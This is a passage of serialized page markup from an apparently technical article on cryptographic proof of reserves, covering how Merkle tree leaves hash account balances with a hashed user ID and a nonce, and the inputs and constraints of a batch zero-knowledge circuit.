PoR.",{"type":25,"tag":34,"props":96888,"children":96889},{},[96890],{"type":25,"tag":38,"props":96891,"children":96892},{},[96893],{"type":31,"value":96894},"Note 2: We add empty proofs as padding to chunks that don't have the correct length.",{"type":25,"tag":38,"props":96896,"children":96897},{},[96898],{"type":31,"value":96899},"Each non-leaf node in this tree is a ZK proof, which is generated using the related circuit; each circuit also generates the Merkle tree hash of each node, which is included in the Merkle tree.",{"type":25,"tag":606,"props":96901,"children":96903},{"id":96902},"leaf-nodes",[96904],{"type":31,"value":96905},"Leaf Nodes",{"type":25,"tag":38,"props":96907,"children":96908},{},[96909],{"type":31,"value":96910},"The leaf nodes are the hashes of the account information. It is calculated in this way:",{"type":25,"tag":38,"props":96912,"children":96913},{},[96914],{"type":25,"tag":82,"props":96915,"children":96917},{"className":96916},[212,4702],[96918],{"type":25,"tag":216,"props":96919,"children":96921},{"className":96920},[224],[96922],{"type":25,"tag":216,"props":96923,"children":96925},{"className":96924,"ariaHidden":230},[229],[96926,96953],{"type":25,"tag":216,"props":96927,"children":96929},{"className":96928},[235],[96930,96935,96940,96944,96949],{"type":25,"tag":216,"props":96931,"children":96934},{"className":96932,"style":96933},[240],"height:0.6944em;",[],{"type":25,"tag":216,"props":96936,"children":96938},{"className":96937},[246,2151],[96939],{"type":31,"value":2611},{"type":25,"tag":216,"props":96941,"children":96943},{"className":96942,"style":258},[257],[],{"type":25,"tag":216,"props":96945,"children":96947},{"className":96946},[263],[96948],{"type":31,"value":266},{"type":25,"tag":216,"props":96950,"children":96952},{"className":96951,"style":258},[257],[],{"type":25,"tag":216,"props":96954,"children":96956},{"className":96955},[235],[96957,96962,96967,96973,96978,96983,96989,96994,96999,97004,97010,97015,97020,97026,97033,97039,97045,97103,97108,97114,97119,97124,97129,97134,97139,97144,97149,97154,97159,97216,97221,97226,97231,97236,97241,97246,97251,97256,97262,97267,97273,97279,97284,97289,97294,97299,97304,97309,97314,97319,97324,97329,97334,97339,97344,97349],{"type":25,"tag":216,"props":96958,"children":96961},{"className":96959,"style":96960},[240],"height:1.06em;vertical-align:-0.31em;",[],{"type":25,"tag":216,"props":96963,"children":96965},{"className":96964,"style":2152},[246,2151],[96966],{"type":31,"value":2155},{"type":25,"tag":216,"props":96968,"children":96970},{"className":96969},[246,2151],[96971],{"type":31,"value":96972},"ose",{"type":25,"tag":216,"props":96974,"children":96976},{"className":96975},[246,2151],[96977],{"type":31,"value":2289},{"type":25,"tag":216,"props":96979,"children":96981},{"className":96980},[246,2151],[96982],{"type":31,"value":74534},{"type":25,"tag":216,"props":96984,"children":96986},{"className":96985},[246,2151],[96987],{"type":31,"value":96988},"o",{"type":25,"tag":216,"props":96990,"children":96992},{"className":96991},[246,2151],[96993],{"type":31,"value":2196},{"type":25,"tag":216,"props":96995,"children":96997},{"className":96996},[287],[96998],{"type":31,"value":1850},{"type":25,"tag":216,"props":97000,"children":97002},{"className":97001},[246,2151],[97003],{"type":31,"value":162},{"type":25,"tag":216,"props":97005,"children":97007},{"className":97006},[246,2151],[97008],{"type":31,"value":97009},"sse",{"type":25,"tag":216,"props":97011,"children":97013},{"className":97012},[246,2151],[97014],{"type":31,"value":2934},{"type":25,"tag":216,"props":97016,"children":97018},{"className":97017,"style":2752},[246],[97019],{"type":31,"value":7031},{"type":25,"tag":216,"props":97021,"children":97023},{"className":97022},[246,2151],[97024],{"type":31,"value":97025},"ba",{"type":25,"tag":216,"props":97027,"children":97030},{"className":97028,"style":97029},[246,2151],"margin-right:0.01968em;",[97031],{"type":31,"value":97032},"l",{"type":25,"tag":216,"props":97034,"children":97036},{"className":97035},[246,2151],[97037],{"type":31,"value":97038},"an",{"type":25,"tag":216,"props":97040,"children":97042},{"className":97041},[246,2151],[97043],{"type":31,"value":97044},"ce",{"type":25,"tag":216,"props":97046,"children":97048},{"className":97047},[246],[97049,97054],{"type":25,"tag":216,"props":97050,"children":97052},{"className":97051},[246,2151],[97053],{"type":31,"value":3245},{"type":25,"tag":216,"props":97055,"children":97057},{"className":97056},[2159],[97058],{"type":25,"tag":216,"props":97059,"children":97061},{"className":97060},[298,299],[97062,97092],{"type":25,"tag":216,"props":97063,"children":97065},{"className":97064},[304],[97066,97087],{"type":25,"tag":216,"props":97067,"children":97070},{"className":97068,"style":97069},[309],"height:0.3011em;",[97071],{"type":25,"tag":216,"props":97072,"children":97073},{"style":2274},[97074,97078],{"type":25,"tag":216,"props":97075,"children":97077},{"className":97076,"style":2181},[319],[],{"type":25,"tag":216,"props":97079,"children":97081},{"className":97080},[2186,2187,2188,2189],[97082],{"type":25,"tag":216,"props":97083,"children":97085},{"className":97084},[246,2189],[97086],{"type":31,"value":1882},{"type":25,"tag":216,"props":97088,"children":97090},{"className":97089},[408],[97091],{"type":31,"value":411},{"type":25,"tag":216,"props":97093,"children":97095},{"className":97094},[304],[97096],{"type":25,"tag":216,"props":97097,"children":97099},{"className":97098,"style":2209},[309],[97100],{"type":25,"tag":216,"props":97101,"children":97102},{},[],{"type":25,"tag":216,"props":97104,"children":97106},{"className":97105},[257],[97107],{"type":31,"value":25641},{"type":25,"tag":216,"props":97109,"children":97111},{"className":97110},[246],[97112],{"type":31,"value":97113},"∣∣",{"type":25,"tag":216,"props":97115,"children":97117},{"className":97116},[257],[97118],{"type":31,"value":25641},{"type":25,"tag":216,"props":97120,"children":97122},{"className":97121},[246,2151],[97123],{"type":31,"value":162},{"type":25,"tag":216,"props":97125,"children":97127},{"className":97126},[246,2151],[97128],{"type":31,"value":97009},{"type":25,"tag":216,"props":97130,"children":97132},{"className":97131},[246,2151],[97133],{"type":31,"value":2934},{"type":25,"tag":216,"props":97135,"children":97137},{"className":97136,"style":2752},[246],[97138],{"type":31,"value":7031},{"type":25,"tag":216,"props":97140,"children":97142},{"className":97141},[246,2151],[97143],{"type":31,"value":97025},{"type":25,"tag":216,"props":97145,"children":97147},{"className":97146,"style":97029},[246,2151],[97148],{"type":31,"value":97032},{"type":25,"tag":216,"props":97150,"children":97152},{"className":97151},[246,2151],[97153],{"type":31,"value":97038},{"type":25,"tag":216,"props":97155,"children":97157},{"className":97156},[246,2151],[97158],{"type":31,"value":97044},{"type":25,"tag":216,"props":97160,"children":97162},{"className":97161},[246],[97163,97168],{"type":25,"tag":216,"props":97164,"children":97166},{"className":97165},[246,2151],[97167],{"type":31,"value":3245},{"type":25,"tag":216,"props":97169,"children":97171},{"className":97170},[2159],[97172],{"type":25,"tag":216,"props":97173,"children":97175},{"className":97174},[298,299],[97176,97205],{"type":25,"tag":216,"props":97177,"children":97179},{"className":97178},[304],[97180,97200],{"type":25,"tag":216,"props":97181,"children":97183},{"className":97182,"style":97069},[309],[97184],{"type":25,"tag":216,"props":97185,"children":97186},{"style":2274},[97187,97191],{"type":25,"tag":216,"props":97188,"children":97190},{"className":97189,"style":2181},[319],[],{"type":25,"tag":216,"props":97192,"children":97194},{"className":97193},[2186,2187,2188,2189],[97195],{"type":25,"tag":216,"props":97196,"children":97198},{"className":97197},[246,2189],[97199],{"type":31,"value":184},{"type":25,"tag":216,"props":97201,"children":97203},{"className":97202},[408],[97204],{"type":31,"value":411},{"type":25,"tag":216,"props":97206,"children":97208},{"className":97207},[304],[97209],{"type":25,"tag":216,"props":97210,"children":97212},{"className":97211,"style":2209},[309],[97213],{"type":25,"tag":216,"props":97214,"children":97215},{},[],{"type":25,"tag":216,"props":97217,"children":97219},{"className":97218},[257],[97220],{"type":31,"value":25641},{"type":25,"tag":216,"props":97222,"children":97224},{"className":97223},[246],[97225],{"type":31,"value":13547},{"type":25,"tag":216,"props":97227,"children":97229},{"className":97228},[257],[97230],{"type":31,"value":25641},{"type":25,"tag":216,"props":97232,"children":97234},{"className":97233},[246],[97235],{"type":31,"value":97113},{"type":25,"tag":216,"props":97237,"children":97239},{"className":97238},[257],[97240],{"type":31,"value":25641},{"type":25,"tag":216,"props":97242,"children":97244},{"className":97243,"style":5269},[246,2151],[97245],{"type":31,"value":5272},{"type":25,"tag":216,"props":97247,"children":97249},{"className":97248,"style":2679},[246,2151],[97250],{"type":31,"value":2682},{"type":25,"tag":216,"props":97252,"children":97254},{"className":97253},[246,2151],[97255],{"type":31,"value":80739},{"type":25,"tag":216,"props":97257,"children":97259},{"className":97258},[246],[97260],{"type":31,"value":97261},"256",{"type":25,"tag":216,"props":97263,"children":97265},{"className":97264},[287],[97266],{"type":31,"value":1850},{"type":25,"tag":216,"props":97268,"children":97270},{"className":97269},[246,2151],[97271],{"type":31,"value":97272},"u",{"type":25,"tag":216,"props":97274,"children":97276},{"className":97275,"style":2752},[246,2151],[97277],{"type":31,"value":97278},"ser",{"type":25,"tag":216,"props":97280,"children":97282},{"className":97281,"style":2752},[246],[97283],{"type":31,"value":7031},{"type":25,"tag":216,"props":97285,"children":97287},{"className":97286},[246,2151],[97288],{"type":31,"value":2289},{"type":25,"tag":216,"props":97290,"children":97292},{"className":97291},[246,2151],[97293],{"type":31,"value":74534},{"type":25,"tag":216,"props":97295,"children":97297},{"className":97296},[427],[97298],{"type":31,"value":1888},{"type":25,"tag":216,"props":97300,"children":97302},{"className":97301},[257],[97303],{"type":31,"value":25641},{"type":25,"tag":216,"props":97305,"children":97307},{"className":97306},[246],[97308],{"type":31,"value":97113},{"type":25,"tag":216,"props":97310,"children":97312},{"className":97311},[257],[97313],{"type":31,"value":25641},{"type":25,"tag":216,"props":97315,"children":97317},{"className":97316},[246,2151],[97318],{"type":31,"value":97272},{"type":25,"tag":216,"props":97320,"children":97322},{"className":97321,"style":2752},[246,2151],[97323],{"type":31,"value":97278},{"type":25,"tag":216,"props":97325,"children":97327},{"className":97326,"style":2752},[246],[97328],{"type":31,"value":7031},{"type":25,"tag":216,"props":97330,"children":97332},{"className":97331},[246,2151],[97333],{"type":31,"value":2196},{"type":25,"tag":216,"props":97335,"children":97337},{"className":97336},[246,2151],[97338],{"type":31,"value":96988},{"type":25,"tag":216,"props":97340,"children":97342},{"className":97341},[246,2151],[97343],{"type":31,"value":2196},{"type":25,"tag":216,"props":97345,"children":97347},{"className":97346},[246,2151],[97348],{"type":31,"value":97044},{"type":25,"tag":216,"props":97350,"children":97352},{"className":97351},[427],[97353],{"type":31,"value":1888},{"type":25,"tag":38,"props":97355,"children":97356},{},[97357,97359,97365],{"type":31,"value":97358},"In other words, all balances are concatenated with the hashed user ID (which can be a ",{"type":25,"tag":82,"props":97360,"children":97362},{"className":97361},[],[97363],{"type":31,"value":97364},"uuid",{"type":31,"value":97366},", a username or an incremental ID) and with a nonce. The nonce is a random number that serves as a security measure against attackers who could brute-force the hash to find out other users' balances. Since the Merkle tree is a public proof, we need to be careful against these types of data leaks.",{"type":25,"tag":606,"props":97368,"children":97370},{"id":97369},"batch-circuit",[97371],{"type":31,"value":97372},"Batch Circuit",{"type":25,"tag":38,"props":97374,"children":97375},{},[97376],{"type":31,"value":97377},"The batch circuit is the first proven circuit in the PoR algorithm. It receives the account's information (grouped in 512) and generates the ZK proof with those constraints:",{"type":25,"tag":38,"props":97379,"children":97380},{},[97381],{"type":25,"tag":9273,"props":97382,"children":97383},{},[97384],{"type":31,"value":97385},"Public Inputs",{"type":25,"tag":2039,"props":97387,"children":97388},{},[97389,97394,97399],{"type":25,"tag":2043,"props":97390,"children":97391},{},[97392],{"type":31,"value":97393},"Asset prices in USD",{"type":25,"tag":2043,"props":97395,"children":97396},{},[97397],{"type":31,"value":97398},"Merkle tree hash",{"type":25,"tag":2043,"props":97400,"children":97401},{},[97402],{"type":31,"value":97403},"Summed asset balances",{"type":25,"tag":38,"props":97405,"children":97406},{},[97407],{"type":25,"tag":9273,"props":97408,"children":97409},{},[97410],{"type":31,"value":97411},"Private Inputs",{"type":25,"tag":2039,"props":97413,"children":97414},{},[97415,97420],{"type":25,"tag":2043,"props":97416,"children":97417},{},[97418],{"type":31,"value":97419},"Users balances",{"type":25,"tag":2043,"props":97421,"children":97422},{},[97423],{"type":31,"value":97424},"Merkle tree leaves hashes",{"type":25,"tag":38,"props":97426,"children":97427},{},[97428],{"type":25,"tag":9273,"props":97429,"children":97430},{},[97431],{"type":31,"value":97432},"Constraints",{"type":25,"tag":2039,"props":97434,"children":97435},{},[97436,97886,98053,98400,98797],{"type":25,"tag":2043,"props":97437,"children":97438},{},[97439],{"type":25,"tag":82,"props":97440,"children":97442},{"className":97441},[212,4702],[97443],{"type":25,"tag":216,"props":97444,"children":97446},{"className":97445},[224],[97447],{"type":25,"tag":216,"props":97448,"children":97450},{"className":97449,"ariaHidden":230},[229],[97451,97587,97791],{"type":25,"tag":216,"props":97452,"children":97454},{"className":97453},[235],[97455,97460,97465,97471,97476,97481,97486,97491,97496,97502,97507,97512,97517,97574,97578,97583],{"type":25,"tag":216,"props":97456,"children":97459},{"className":97457,"style":97458},[240],"height:0.9695em;vertical-align:-0.31em;",[],{"type":25,"tag":216,"props":97461,"children":97463},{"className":97462},[246,2151],[97464],{"type":31,"value":162},{"type":25,"tag":216,"props":97466,"children":97468},{"className":97467},[246,2151],[97469],{"type":31,"value":97470},"cco",{"type":25,"tag":216,"props":97472,"children":97474},{"className":97473},[246,2151],[97475],{"type":31,"value":97272},{"type":25,"tag":216,"props":97477,"children":97479},{"className":97478},[246,2151],[97480],{"type":31,"value":2196},{"type":25,"tag":216,"props":97482,"children":97484},{"className":97483},[246,2151],[97485],{"type":31,"value":2934},{"type":25,"tag":216,"props":97487,"children":97489},{"className":97488,"style":2752},[246],[97490],{"type":31,"value":7031},{"type":25,"tag":216,"props":97492,"children":97494},{"className":97493},[246,2151],[97495],{"type":31,"value":2399},{"type":25,"tag":216,"props":97497,"children":97499},{"className":97498,"style":2325},[246,2151],[97500],{"type":31,"value":97501},"q",{"type":25,"tag":216,"props":97503,"children":97505},{"className":97504},[246,2151],[97506],{"type":31,"value":97272},{"type":25,"tag":216,"props":97508,"children":97510},{"className":97509},[246,2151],[97511],{"type":31,"value":2289},{"type":25,"tag":216,"props":97513,"children":97515},{"className":97514},[246,2151],[97516],{"type":31,"value":2934},{"type":25,"tag":216,"props":97518,"children":97520},{"className":97519},[246],[97521,97526],{"type":25,"tag":216,"props":97522,"children":97524},{"className":97523,"style":2325},[246,2151],[97525],{"type":31,"value":7064},{"type":25,"tag":216,"props":97527,"children":97529},{"className":97528},[2159],[97530],{"type":25,"tag":216,"props":97531,"children":97533},{"className":97532},[298,299],[97534,97563],{"type":25,"tag":216,"props":97535,"children":97537},{"className":97536},[304],[97538,97558],{"type":25,"tag":216,"props":97539,"children":97541},{"className":97540,"style":2270},[309],[97542],{"type":25,"tag":216,"props":97543,"children":97544},{"style":2347},[97545,97549],{"type":25,"tag":216,"props":97546,"children":97548},{"className":97547,"style":2181},[319],[],{"type":25,"tag":216,"props":97550,"children":97552},{"className":97551},[2186,2187,2188,2189],[97553],{"type":25,"tag":216,"props":97554,"children":97556},{"className":97555},[246,2151,2189],[97557],{"type":31,"value":2289},{"type":25,"tag":216,"props":97559,"children":97561},{"className":97560},[408],[97562],{"type":31,"value":411},{"type":25,"tag":216,"props":97564,"children":97566},{"className":97565},[304],[97567],{"type":25,"tag":216,"props":97568,"children":97570},{"className":97569,"style":2209},[309],[97571],{"type":25,"tag":216,"props":97572,"children":97573},{},[],{"type":25,"tag":216,"props":97575,"children":97577},{"className":97576,"style":258},[257],[],{"type":25,"tag":216,"props":97579,"children":97581},{"className":97580},[263],[97582],{"type":31,"value":12528},{"type":25,"tag":216,"props":97584,"children":97586},{"className":97585,"style":258},[257],[],{"type":25,"tag":216,"props":97588,"children":97590},{"className":97589},[235],[97591,97595,97601,97606,97611,97616,97621,97626,97631,97636,97641,97646,97651,97656,97661,97666,97671,97676,97733,97738,97743,97748,97753,97758,97763,97768,97773,97778,97782,97787],{"type":25,"tag":216,"props":97592,"children":97594},{"className":97593,"style":96960},[240],[],{"type":25,"tag":216,"props":97596,"children":97598},{"className":97597},[246],[97599],{"type":31,"value":97600},"Σ",{"type":25,"tag":216,"props":97602,"children":97604},{"className":97603},[257],[97605],{"type":31,"value":25641},{"type":25,"tag":216,"props":97607,"children":97609},{"className":97608},[246,2151],[97610],{"type":31,"value":162},{"type":25,"tag":216,"props":97612,"children":97614},{"className":97613},[246,2151],[97615],{"type":31,"value":97470},{"type":25,"tag":216,"props":97617,"children":97619},{"className":97618},[246,2151],[97620],{"type":31,"value":97272},{"type":25,"tag":216,"props":97622,"children":97624},{"className":97623},[246,2151],[97625],{"type":31,"value":2196},{"type":25,"tag":216,"props":97627,"children":97629},{"className":97628},[246,2151],[97630],{"type":31,"value":2934},{"type":25,"tag":216,"props":97632,"children":97634},{"className":97633,"style":2752},[246],[97635],{"type":31,"value":7031},{"type":25,"tag":216,"props":97637,"children":97639},{"className":97638},[246,2151],[97640],{"type":31,"value":162},{"type":25,"tag":216,"props":97642,"children":97644},{"className":97643},[246,2151],[97645],{"type":31,"value":97009},{"type":25,"tag":216,"props":97647,"children":97649},{"className":97648},[246,2151],[97650],{"type":31,"value":2934},{"type":25,"tag":216,"props":97652,"children":97654},{"className":97653,"style":2752},[246],[97655],{"type":31,"value":7031},{"type":25,"tag":216,"props":97657,"children":97659},{"className":97658},[246,2151],[97660],{"type":31,"value":97025},{"type":25,"tag":216,"props":97662,"children":97664},{"className":97663,"style":97029},[246,2151],[97665],{"type":31,"value":97032},{"type":25,"tag":216,"props":97667,"children":97669},{"className":97668},[246,2151],[97670],{"type":31,"value":97038},{"type":25,"tag":216,"props":97672,"children":97674},{"className":97673},[246,2151],[97675],{"type":31,"value":97044},{"type":25,"tag":216,"props":97677,"children":97679},{"className":97678},[246],[97680,97685],{"type":25,"tag":216,"props":97681,"children":97683},{"className":97682},[246,2151],[97684],{"type":31,"value":3245},{"type":25,"tag":216,"props":97686,"children":97688},{"className":97687},[2159],[97689],{"type":25,"tag":216,"props":97690,"children":97692},{"className":97691},[298,299],[97693,97722],{"type":25,"tag":216,"props":97694,"children":97696},{"className":97695},[304],[97697,97717],{"type":25,"tag":216,"props":97698,"children":97700},{"className":97699,"style":2270},[309],[97701],{"type":25,"tag":216,"props":97702,"children":97703},{"style":2274},[97704,97708],{"type":25,"tag":216,"props":97705,"children":97707},{"className":97706,"style":2181},[319],[],{"type":25,"tag":216,"props":97709,"children":97711},{"className":97710},[2186,2187,2188,2189],[97712],{"type":25,"tag":216,"props":97713,"children":97715},{"className":97714},[246,2151,2189],[97716],{"type":31,"value":2289},{"type":25,"tag":216,"props":97718,"children":97720},{"className":97719},[408],[97721],{"type":31,"value":411},{"type":25,"tag":216,"props":97723,"children":97725},{"className":97724},[304],[97726],{"type":25,"tag":216,"props":97727,"children":97729},{"className":97728,"style":2209},[309],[97730],{"type":25,"tag":216,"props":97731,"children":97732},{},[],{"type":25,"tag":216,"props":97734,"children":97736},{"className":97735},[287],[97737],{"type":31,"value":7701},{"type":25,"tag":216,"props":97739,"children":97741},{"className":97740},[246,2151],[97742],{"type":31,"value":162},{"type":25,"tag":216,"props":97744,"children":97746},{"className":97745},[246,2151],[97747],{"type":31,"value":97009},{"type":25,"tag":216,"props":97749,"children":97751},{"className":97750},[246,2151],[97752],{"type":31,"value":2934},{"type":25,"tag":216,"props":97754,"children":97756},{"className":97755,"style":2752},[246],[97757],{"type":31,"value":7031},{"type":25,"tag":216,"props":97759,"children":97761},{"className":97760},[246,2151],[97762],{"type":31,"value":2196},{"type":25,"tag":216,"props":97764,"children":97766},{"className":97765},[246,2151],[97767],{"type":31,"value":97272},{"type":25,"tag":216,"props":97769,"children":97771},{"className":97770},[246,2151],[97772],{"type":31,"value":55102},{"type":25,"tag":216,"props":97774,"children":97776},{"className":97775},[427],[97777],{"type":31,"value":19368},{"type":25,"tag":216,"props":97779,"children":97781},{"className":97780,"style":335},[257],[],{"type":25,"tag":216,"props":97783,"children":97785},{"className":97784},[340],[97786],{"type":31,"value":8051},{"type":25,"tag":216,"props":97788,"children":97790},{"className":97789,"style":335},[257],[],{"type":25,"tag":216,"props":97792,"children":97794},{"className":97793},[235],[97795,97799,97804,97809,97814,97819,97824,97830,97835,97841,97846,97851,97856,97861,97866,97871,97876,97881],{"type":25,"tag":216,"props":97796,"children":97798},{"className":97797,"style":96960},[240],[],{"type":25,"tag":216,"props":97800,"children":97802},{"className":97801},[246,2151],[97803],{"type":31,"value":162},{"type":25,"tag":216,"props":97805,"children":97807},{"className":97806},[246,2151],[97808],{"type":31,"value":97009},{"type":25,"tag":216,"props":97810,"children":97812},{"className":97811},[246,2151],[97813],{"type":31,"value":2934},{"type":25,"tag":216,"props":97815,"children":97817},{"className":97816,"style":2752},[246],[97818],{"type":31,"value":7031},{"type":25,"tag":216,"props":97820,"children":97822},{"className":97821},[246,2151],[97823],{"type":31,"value":38},{"type":25,"tag":216,"props":97825,"children":97827},{"className":97826,"style":2752},[246,2151],[97828],{"type":31,"value":97829},"r",{"type":25,"tag":216,"props":97831,"children":97833},{"className":97832},[246,2151],[97834],{"type":31,"value":2289},{"type":25,"tag":216,"props":97836,"children":97838},{"className":97837},[246,2151],[97839],{"type":31,"value":97840},"ces",{"type":25,"tag":216,"props":97842,"children":97844},{"className":97843},[287],[97845],{"type":31,"value":7701},{"type":25,"tag":216,"props":97847,"children":97849},{"className":97848},[246,2151],[97850],{"type":31,"value":162},{"type":25,"tag":216,"props":97852,"children":97854},{"className":97853},[246,2151],[97855],{"type":31,"value":97009},{"type":25,"tag":216,"props":97857,"children":97859},{"className":97858},[246,2151],[97860],{"type":31,"value":2934},{"type":25,"tag":216,"props":97862,"children":97864},{"className":97863,"style":2752},[246],[97865],{"type":31,"value":7031},{"type":25,"tag":216,"props":97867,"children":97869},{"className":97868},[246,2151],[97870],{"type":31,"value":2196},{"type":25,"tag":216,"props":97872,"children":97874},{"className":97873},[246,2151],[97875],{"type":31,"value":97272},{"type":25,"tag":216,"props":97877,"children":97879},{"className":97878},[246,2151],[97880],{"type":31,"value":55102},{"type":25,"tag":216,"props":97882,"children":97884},{"className":97883},[427],[97885],{"type":31,"value":19368},{"type":25,"tag":2043,"props":97887,"children":97888},{},[97889,98047,98048],{"type":25,"tag":82,"props":97890,"children":97892},{"className":97891},[212,4702],[97893],{"type":25,"tag":216,"props":97894,"children":97896},{"className":97895},[224],[97897],{"type":25,"tag":216,"props":97898,"children":97900},{"className":97899,"ariaHidden":230},[229],[97901,98034],{"type":25,"tag":216,"props":97902,"children":97904},{"className":97903},[235],[97905,97909,97914,97919,97924,97929,97934,97939,97944,97949,97954,97959,97964,98021,98025,98030],{"type":25,"tag":216,"props":97906,"children":97908},{"className":97907,"style":97458},[240],[],{"type":25,"tag":216,"props":97910,"children":97912},{"className":97911},[246,2151],[97913],{"type":31,"value":162},{"type":25,"tag":216,"props":97915,"children":97917},{"className":97916},[246,2151],[97918],{"type":31,"value":97470},{"type":25,"tag":216,"props":97920,"children":97922},{"className":97921},[246,2151],[97923],{"type":31,"value":97272},{"type":25,"tag":216,"props":97925,"children":97927},{"className":97926},[246,2151],[97928],{"type":31,"value":2196},{"type":25,"tag":216,"props":97930,"children":97932},{"className":97931},[246,2151],[97933],{"type":31,"value":2934},{"type":25,"tag":216,"props":97935,"children":97937},{"className":97936,"style":2752},[246],[97938],{"type":31,"value":7031},{"type":25,"tag":216,"props":97940,"children":97942},{"className":97941},[246,2151],[97943],{"type":31,"value":2399},{"type":25,"tag":216,"props":97945,"children":97947},{"className":97946,"style":2325},[246,2151],[97948],{"type":31,"value":97501},{"type":25,"tag":216,"props":97950,"children":97952},{"className":97951},[246,2151],[97953],{"type":31,"value":97272},{"type":25,"tag":216,"props":97955,"children":97957},{"className":97956},[246,2151],[97958],{"type":31,"value":2289},{"type":25,"tag":216,"props":97960,"children":97962},{"className":97961},[246,2151],[97963],{"type":31,"value":2934},{"type":25,"tag":216,"props":97965,"children":97967},{"className":97966},[246],[97968,97973],{"type":25,"tag":216,"props":97969,"children":97971},{"className":97970,"style":2325},[246,2151],[97972],{"type":31,"value":7064},{"type":25,"tag":216,"props":97974,"children":97976},{"className":97975},[2159],[97977],{"type":25,"tag":216,"props":97978,"children":97980},{"className":97979},[298,299],[97981,98010],{"type":25,"tag":216,"props":97982,"children":97984},{"className":97983},[304],[97985,98005],{"type":25,"tag":216,"props":97986,"children":97988},{"className":97987,"style":2270},[309],[97989],{"type":25,"tag":216,"props":97990,"children":97991},{"style":2347},[97992,97996],{"type":25,"tag":216,"props":97993,"children":97995},{"className":97994,"style":2181},[319],[],{"type":25,"tag":216,"props":97997,"children":97999},{"className":97998},[2186,2187,2188,2189],[98000],{"type":25,"tag":216,"props":98001,"children":98003},{"className":98002},[246,2151,2189],[98004],{"type":31,"value":2289},{"type":25,"tag":216,"props":98006,"children":98008},{"className":98007},[408],[98009],{"type":31,"value":411},{"type":25,"tag":216,"props":98011,"children":98013},{"className":98012},[304],[98014],{"type":25,"tag":216,"props":98015,"children":98017},{"className":98016,"style":2209},[309],[98018],{"type":25,"tag":216,"props":98019,"children":98020},{},[],{"type":25,"tag":216,"props":98022,"children":98024},{"className":98023,"style":258},[257],[],{"type":25,"tag":216,"props":98026,"children":98028},{"className":98027},[263],[98029],{"type":31,"value":13900},{"type":25,"tag":216,"props":98031,"children":98033},{"className":98032,"style":258},[257],[],{"type":25,"tag":216,"props":98035,"children":98037},{"className":98036},[235],[98038,98042],{"type":25,"tag":216,"props":98039,"children":98041},{"className":98040,"style":5293},[240],[],{"type":25,"tag":216,"props":98043,"children":98045},{"className":98044},[246],[98046],{"type":31,"value":1882},{"type":31,"value":10409},{"type":25,"tag":9273,"props":98049,"children":98050},{},[98051],{"type":31,"value":98052},"(non-negativity)",{"type":25,"tag":2043,"props":98054,"children":98055},{},[98056,98394,98395],{"type":25,"tag":82,"props":98057,"children":98059},{"className":98058},[212,4702],[98060],{"type":25,"tag":216,"props":98061,"children":98063},{"className":98062},[224],[98064],{"type":25,"tag":216,"props":98065,"children":98067},{"className":98066,"ariaHidden":230},[229],[98068,98204],{"type":25,"tag":216,"props":98069,"children":98071},{"className":98070},[235],[98072,98076,98081,98086,98091,98096,98101,98106,98111,98116,98121,98126,98131,98136,98141,98146,98151,98156,98161,98166,98171,98176,98181,98186,98191,98195,98200],{"type":25,"tag":216,"props":98073,"children":98075},{"className":98074,"style":96960},[240],[],{"type":25,"tag":216,"props":98077,"children":98079},{"className":98078},[246,2151],[98080],{"type":31,"value":2934},{"type":25,"tag":216,"props":98082,"children":98084},{"className":98083},[246,2151],[98085],{"type":31,"value":96988},{"type":25,"tag":216,"props":98087,"children":98089},{"className":98088},[246,2151],[98090],{"type":31,"value":2934},{"type":25,"tag":216,"props":98092,"children":98094},{"className":98093},[246,2151],[98095],{"type":31,"value":162},{"type":25,"tag":216,"props":98097,"children":98099},{"className":98098,"style":97029},[246,2151],[98100],{"type":31,"value":97032},{"type":25,"tag":216,"props":98102,"children":98104},{"className":98103,"style":2752},[246],[98105],{"type":31,"value":7031},{"type":25,"tag":216,"props":98107,"children":98109},{"className":98108},[246,2151],[98110],{"type":31,"value":162},{"type":25,"tag":216,"props":98112,"children":98114},{"className":98113},[246,2151],[98115],{"type":31,"value":97009},{"type":25,"tag":216,"props":98117,"children":98119},{"className":98118},[246,2151],[98120],{"type":31,"value":2934},{"type":25,"tag":216,"props":98122,"children":98124},{"className":98123,"style":2752},[246],[98125],{"type":31,"value":7031},{"type":25,"tag":216,"props":98127,"children":98129},{"className":98128},[246,2151],[98130],{"type":31,"value":97025},{"type":25,"tag":216,"props":98132,"children":98134},{"className":98133,"style":97029},[246,2151],[98135],{"type":31,"value":97032},{"type":25,"tag":216,"props":98137,"children":98139},{"className":98138},[246,2151],[98140],{"type":31,"value":97038},{"type":25,"tag":216,"props":98142,"children":98144},{"className":98143},[246,2151],[98145],{"type":31,"value":97044},{"type":25,"tag":216,"props":98147,"children":98149},{"className":98148},[287],[98150],{"type":31,"value":7701},{"type":25,"tag":216,"props":98152,"children":98154},{"className":98153},[246,2151],[98155],{"type":31,"value":162},{"type":25,"tag":216,"props":98157,"children":98159},{"className":98158},[246,2151],[98160],{"type":31,"value":97009},{"type":25,"tag":216,"props":98162,"children":98164},{"className":98163},[246,2151],[98165],{"type":31,"value":2934},{"type":25,"tag":216,"props":98167,"children":98169},{"className":98168,"style":2752},[246],[98170],{"type":31,"value":7031},{"type":25,"tag":216,"props":98172,"children":98174},{"className":98173},[246,2151],[98175],{"type":31,"value":2196},{"type":25,"tag":216,"props":98177,"children":98179},{"className":98178},[246,2151],[98180],{"type":31,"value":97272},{"type":25,"tag":216,"props":98182,"children":98184},{"className":98183},[246,2151],[98185],{"type":31,"value":55102},{"type":25,"tag":216,"props":98187,"children":98189},{"className":98188},[427],[98190],{"type":31,"value":19368},{"type":25,"tag":216,"props":98192,"children":98194},{"className":98193,"style":258},[257],[],{"type":25,"tag":216,"props":98196,"children":98198},{"className":98197},[263],[98199],{"type":31,"value":12528},{"type":25,"tag":216,"props":98201,"children":98203},{"className":98202,"style":258},[257],[],{"type":25,"tag":216,"props":98205,"children":98207},{"className":98206},[235],[98208,98212,98217,98222,98227,98232,98237,98242,98247,98252,98257,98262,98267,98272,98277,98282,98287,98292,98349,98354,98359,98364,98369,98374,98379,98384,98389],{"type":25,"tag":216,"props":98209,"children":98211},{"className":98210,"style":96960},[240],[],{"type":25,"tag":216,"props":98213,"children":98215},{"className":98214},[246],[98216],{"type":31,"value":97600},{"type":25,"tag":216,"props":98218,"children":98220},{"className":98219},[257],[98221],{"type":31,"value":25641},{"type":25,"tag":216,"props":98223,"children":98225},{"className":98224},[246,2151],[98226],{"type":31,"value":162},{"type":25,"tag":216,"props":98228,"children":98230},{"className":98229},[246,2151],[98231],{"type":31,"value":97470},{"type":25,"tag":216,"props":98233,"children":98235},{"className":98234},[246,2151],[98236],{"type":31,"value":97